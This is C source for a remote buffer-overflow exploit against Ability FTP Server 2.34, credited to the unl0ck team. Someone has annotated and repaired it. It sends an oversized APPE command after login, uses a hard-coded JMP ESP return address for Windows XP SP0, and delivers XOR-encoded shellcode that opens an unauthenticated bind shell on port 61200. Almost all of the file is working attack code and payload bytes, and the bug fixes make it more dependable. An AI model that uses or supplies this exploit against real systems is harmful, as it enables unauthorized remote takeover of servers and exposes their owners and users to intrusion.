
Ability FTPd v2.34 Remote Commands Buffer Overflow Exploit

/*

TESTED ON WINXP SP0 RUS

(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru

HAPPY NEW YEAR!

Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...

*/
/*
 * Headers reconstructed: the archived copy lost the <...> targets of the four
 * original #include lines. winsock2.h (which pulls in windows.h) provides
 * WSAStartup/socket/connect/Sleep; the C headers cover printf, exit,
 * memset/memcpy/strlen. Link with ws2_32.lib.
 */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

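/*
 * Second-stage payload: a bind shell on TCP 61200, credited to the m00 team by
 * the original author. What can be read directly from the bytes:
 *   - bytes 0..4   five NOPs
 *   - bytes 5..26  a self-decoding stub: jmp/call to get the payload address
 *                  into EAX, then `xor byte [eax],0xBB; inc eax;
 *                  cmp dword [eax],"m00!"; jnz` until the "m00!" marker
 *                  (\x6D\x30\x30\x21) that ends the last line.
 *   - XOR-decoding the tail with 0xBB yields the strings GetProcAddress,
 *     LoadLibraryA, ExitProcess, CreateProcessA, ws2_32, WSAStartup,
 *     WSASocketA, bind, listen, accept, cmd — consistent with the bind-shell
 *     note. The decoded instruction stream itself is not analysed here.
 * The archived listing had lost the backslash of every \x escape; they are
 * restored below and nothing else is changed. sizeof(shellcode) == 601
 * (600 payload bytes plus the string terminator); login() copies all 601
 * bytes so the buffer it appends to remains a valid C string.
 * Operational caveat: the listener on 61200 is unauthenticated — anyone who
 * can reach the port gets the shell, not just the operator.
 */
char shellcode[]=
"\x90\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\xBB\x40\x81\x38\x6D"
"\x30\x30\x21\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\x52\xD7\xBA"
"\xBB\xBB\xE6\xEE\x8A\x60\xDF\x30\xB8\xFB\x28\x30\xF8\x44\xFB"
"\xCE\x42\x30\xE8\xB8\xDD\x8A\x69\xDD\x03\xBB\xAB\xDD\x3A\x81"
"\xF6\xE1\xCF\xBC\x92\x79\x52\x49\x44\x44\x44\x32\x68\x30\xC1"
"\x87\xBA\x6C\xB8\xE4\xC3\x30\xF0\xA3\x30\xC8\x9B\x30\xC0\x9F"
"\xBA\x6D\xBA\x6C\x47\x16\xBA\x6B\x2D\x3C\x46\xEA\x8A\x72\x3B"
"\x7A\xB4\x48\x1D\xC9\xB1\x2D\xE2\x3C\x46\xCF\xA9\xFC\xFC\x59"
"\x5D\x05\xB4\xBB\xBB\xBB\x92\x75\x92\x4C\x52\x53\x44\x44\x44"
"\x8A\x7B\xDD\x30\xBC\x7A\x5B\xB9\x30\xC8\xA7\xBA\x6D\xBA\x7D"
"\x16\xBA\x6B\x32\x7D\x32\x6C\xE6\xEC\x36\x26\xB4\xBB\xBB\xBB"
"\xE8\xEC\x44\x6D\x36\x26\xE8\xBB\xBB\xBB\xE8\x44\x6B\x32\x7C"
"\x36\x3E\xE1\xBB\xBB\xBB\xEB\xEC\x44\x6D\x36\x36\x2C\xBB\xBB"
"\xBB\xEA\xD3\xB9\xBB\xBB\xBB\x44\x6B\x36\x26\xDE\xBB\xBB\xBB"
"\xE8\xEC\x44\x6D\x8A\x72\xEA\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB"
"\xD3\xB9\xBB\xBB\xBB\x44\x6B\x32\x78\x36\x3E\xCB\xBB\xBB\xBB"
"\xEB\xEC\x44\x6D\xD3\xAB\xBB\xBB\xBB\x36\x36\x38\xBB\xBB\xBB"
"\xEA\xE8\x44\x6B\x36\x3E\xCE\xBB\xBB\xBB\xEB\xEC\x44\x6D\xD3"
"\xBA\xBB\xBB\xBB\xE8\x44\x6B\x36\x3E\xC7\xBB\xBB\xBB\xEB\xEC"
"\x44\x6D\x8A\x72\xEA\xEA\xE8\x44\x6B\xE4\xEB\x36\x26\xFC\xBB"
"\xBB\xBB\xE8\xEC\x44\x6D\xD3\x44\xBB\xBB\xBB\xD3\xFB\xBB\xBB"
"\xBB\x44\x6B\x32\x78\x36\x36\x93\xBB\xBB\xBB\xEA\xEC\x44\x6D"
"\xE8\x44\x6B\xE3\x32\xF8\xFB\x32\xF8\x87\x32\xF8\x83\x7C\xF8"
"\x97\xBA\xBA\xBB\xBB\x36\x3E\x83\xBB\xBB\xBB\xEB\xEC\x44\x6D"
"\xE8\xE8\x8A\x72\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB\xEA\xEA\x36"
"\x26\x04\xBB\xBB\xBB\xE8\xEA\x44\x6B\x36\x3E\xA7\xBB\xBB\xBB"
"\xEB\xEC\x44\x6D\x44\x6B\x53\x34\x45\x44\x44\xFC\xDE\xCF\xEB"
"\xC9\xD4\xD8\xFA\xDF\xDF\xC9\xDE\xC8\xC8\xBB\xF7\xD4\xDA\xDF"
"\xF7\xD2\xD9\xC9\xDA\xC9\xC2\xFA\xBB\xFE\xC3\xD2\xCF\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xBB\xFC\xDE\xCF\xE8\xCF\xDA\xC9\xCF\xCE"
"\xCB\xF2\xD5\xDD\xD4\xFA\xBB\xF8\xC9\xDE\xDA\xCF\xDE\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xFA\xBB\xFC\xD7\xD4\xD9\xDA\xD7\xFA\xD7"
"\xD7\xD4\xD8\xBB\xCC\xC8\x89\xE4\x88\x89\xBB\xEC\xE8\xFA\xE8"
"\xCF\xDA\xC9\xCF\xCE\xCB\xBB\xEC\xE8\xFA\xE8\xD4\xD8\xD0\xDE"
"\xCF\xFA\xBB\xD9\xD2\xD5\xDF\xBB\xD7\xD2\xC8\xCF\xDE\xD5\xBB"
"\xDA\xD8\xD8\xDE\xCB\xCF\xBB\xB9\xBB\x54\xAB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBA\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xD8\xD6\xDF\xBB\x6D\x30\x30\x21";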


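/*
 * Resolve `host`, open a TCP connection to `port` and return the connected
 * socket. Any failure prints a message and terminates the process with
 * status 1 — the original also had no recovery path, but exited with 0,
 * which hid failures from scripts.
 *
 * Reviewer notes:
 *  - WSAStartup() is done here and is not balanced in this function; the
 *    caller is responsible for WSACleanup(). Its result was previously
 *    ignored, so a missing Winsock stack surfaced later as a bogus socket().
 *  - gethostbyname() is legacy, IPv4-only and not thread-safe; fine for a
 *    one-shot tool, getaddrinfo() would be the modern choice.
 *  - Only the first address record (h_addr_list[0]) is used, as before.
 *  - The "\n" in every message was lost in the archived copy; restored.
 */
int conn(char *host, u_short port)
{
    WSADATA wsa;
    struct hostent *hp;
    struct sockaddr_in sa;
    SOCKET sock;

    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("WSAStartup() error!\n");
        exit(1);
    }

    hp = gethostbyname(host);
    if (hp == NULL || hp->h_addrtype != AF_INET || hp->h_addr_list[0] == NULL) {
        printf("gethostbyname() error!\n");
        exit(1);
    }

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    /* memcpy replaces the original `**((struct in_addr **) hp->h_addr_list)`:
     * same four bytes, without the aliasing/alignment assumptions. */
    memcpy(&sa.sin_addr, hp->h_addr_list[0], sizeof(sa.sin_addr));

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket() error: %d\n", WSAGetLastError());
        exit(1);
    }

    if (connect(sock, (struct sockaddr *)&sa, sizeof(sa)) == SOCKET_ERROR) {
        printf("connect() error: %d\n", WSAGetLastError());
        closesocket(sock);
        exit(1);
    }

    printf("connected to %s\n", host);
    /* Callers keep the descriptor in an int, as the original did; this is an
     * x86 Windows tool, where SOCKET fits. */
    return (int)sock;
}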


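/*
 * Authenticate on `sock` with USER/PASS and then send the overflowing APPE
 * command. The payload layout is unchanged from the original:
 *
 *   bytes    0..968    0x43 filler
 *   bytes  969..972    0x77F5801C little-endian, a JMP ESP in ntdll.dll —
 *                      valid only on the XP SP0 Russian build the author
 *                      tested; any other build needs a different address
 *   bytes  973..999    0x43 filler (the memset ran to 1000 before the
 *                      address was written, so strlen() is 1000 here)
 *   bytes 1000..1600   shellcode, including its trailing NUL
 *
 * The exact command is also written to bochka.txt in the working directory,
 * a debugging aid the original kept. The process exits with 1 on
 * over-long credentials, a 530 reply, or any send/recv failure.
 *
 * Fixes over the original: the return address is stored with memcpy instead
 * of an int-typed write through a char buffer; recv() is checked and the
 * reply is NUL-terminated before strstr() (it previously searched an
 * uninitialised buffer); fopen() is checked and the file is closed;
 * sprintf() is bounded; the lost "\r\n"/"\n" escapes are restored.
 */
void login(int sock, char *login, char *pass)
{
    /* 0x77F5801C as bytes, so the layout does not depend on host endianness. */
    static const unsigned char jmp_esp[4] = { 0x1C, 0x80, 0xF5, 0x77 };
    char bochka[2000], med[2000];
    char ubuf[1000], pbuf[1000], rc[200];
    FILE *file;
    int n;

    /* Checked first so that nothing is written or sent with bad arguments. */
    if (strlen(pass) >= 100) { printf("2 long password!\n"); exit(1); }
    if (strlen(login) >= 100) { printf("2 long login!\n"); exit(1); }

    memset(bochka, 0x00, sizeof(bochka));
    memset(bochka, 0x43, 1000);
    memcpy(&bochka[969], jmp_esp, sizeof(jmp_esp));
    /* strlen(bochka) is 1000: the address bytes contain no NUL. */
    memcpy(bochka + strlen(bochka), shellcode, sizeof(shellcode));

    /* 5 + 1600 + 2 bytes; snprintf guards the buffer should the layout change. */
    snprintf(med, sizeof(med), "APPE %s\r\n", bochka);

    file = fopen("bochka.txt", "w+");
    if (file != NULL) {
        fprintf(file, "%s", med);
        fclose(file);
    } else {
        printf("warning: could not write bochka.txt\n");
    }

    snprintf(ubuf, sizeof(ubuf), "USER %s\r\n", login);
    if (send(sock, ubuf, (int)strlen(ubuf), 0) == SOCKET_ERROR) {
        printf("send() error!\n");
        exit(1);
    }
    printf("USER sending...\n");
    Sleep(1000);
    printf("OK!\n");

    snprintf(pbuf, sizeof(pbuf), "PASS %s\r\n", pass);
    if (send(sock, pbuf, (int)strlen(pbuf), 0) == SOCKET_ERROR) {
        printf("send() error!\n");
        exit(1);
    }
    printf("PASS sending...\n");
    Sleep(1000);

    /* Read at most sizeof(rc)-1 so a terminator always fits. Note that the
     * greeting and the USER reply may arrive in the same read as the PASS
     * reply; the 530 test runs on whatever fits in the first 199 bytes —
     * confirm against the target's banner length if logins look wrong. */
    n = recv(sock, rc, (int)sizeof(rc) - 1, 0);
    if (n <= 0) {
        printf("recv() error!\n");
        exit(1);
    }
    rc[n] = '\0';
    if (strstr(rc, "530")) { printf("Bad password!\n"); exit(1); }
    printf("OK!\n");
    Sleep(1000);

    printf("Sending 604KY C MEDOM!\n");
    if (send(sock, med, (int)strlen(med), 0) == SOCKET_ERROR) {
        printf("send() error!\n");
        exit(1);
    }
    Sleep(1000);
    printf("TrY To CoNnEcT tO...\n\n");
}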

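/*
 * Entry point: un-aftp.exe <host> <login> <pass>
 *   argv[1]  host of the Ability FTP server (port 21 is hard-coded)
 *   argv[2]  login, argv[3] pass — valid credentials are required; the
 *            overflow is in a post-authentication command (APPE)
 * Returns 0 once the payload has been sent, 1 on a usage error. Failures
 * inside conn()/login() terminate the process from there.
 *
 * Fixes over the original: the lost "\n" escapes are restored; the usage
 * line's argument placeholders, stripped as HTML tags in the archived copy,
 * are rebuilt from how argv is used; the unused `data` local is dropped;
 * WSACleanup() now balances the WSAStartup() performed in conn().
 */
int main(int argc, char **argv)
{
    int sock;

    printf("\nAbility FTP Server <= 2.34 R00T exploit\n");
    printf("by Dark Eagle [ unl0ck team ]\nhttp://unl0ck.void.ru\n\n");

    if (argc < 4) {
        printf("usage: un-aftp.exe <host> <login> <pass>\n\n");
        return 1;
    }

    sock = conn(argv[1], 21);
    login(sock, argv[2], argv[3]);
    closesocket(sock);
    WSACleanup();
    Sleep(2000);

    return 0;
}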
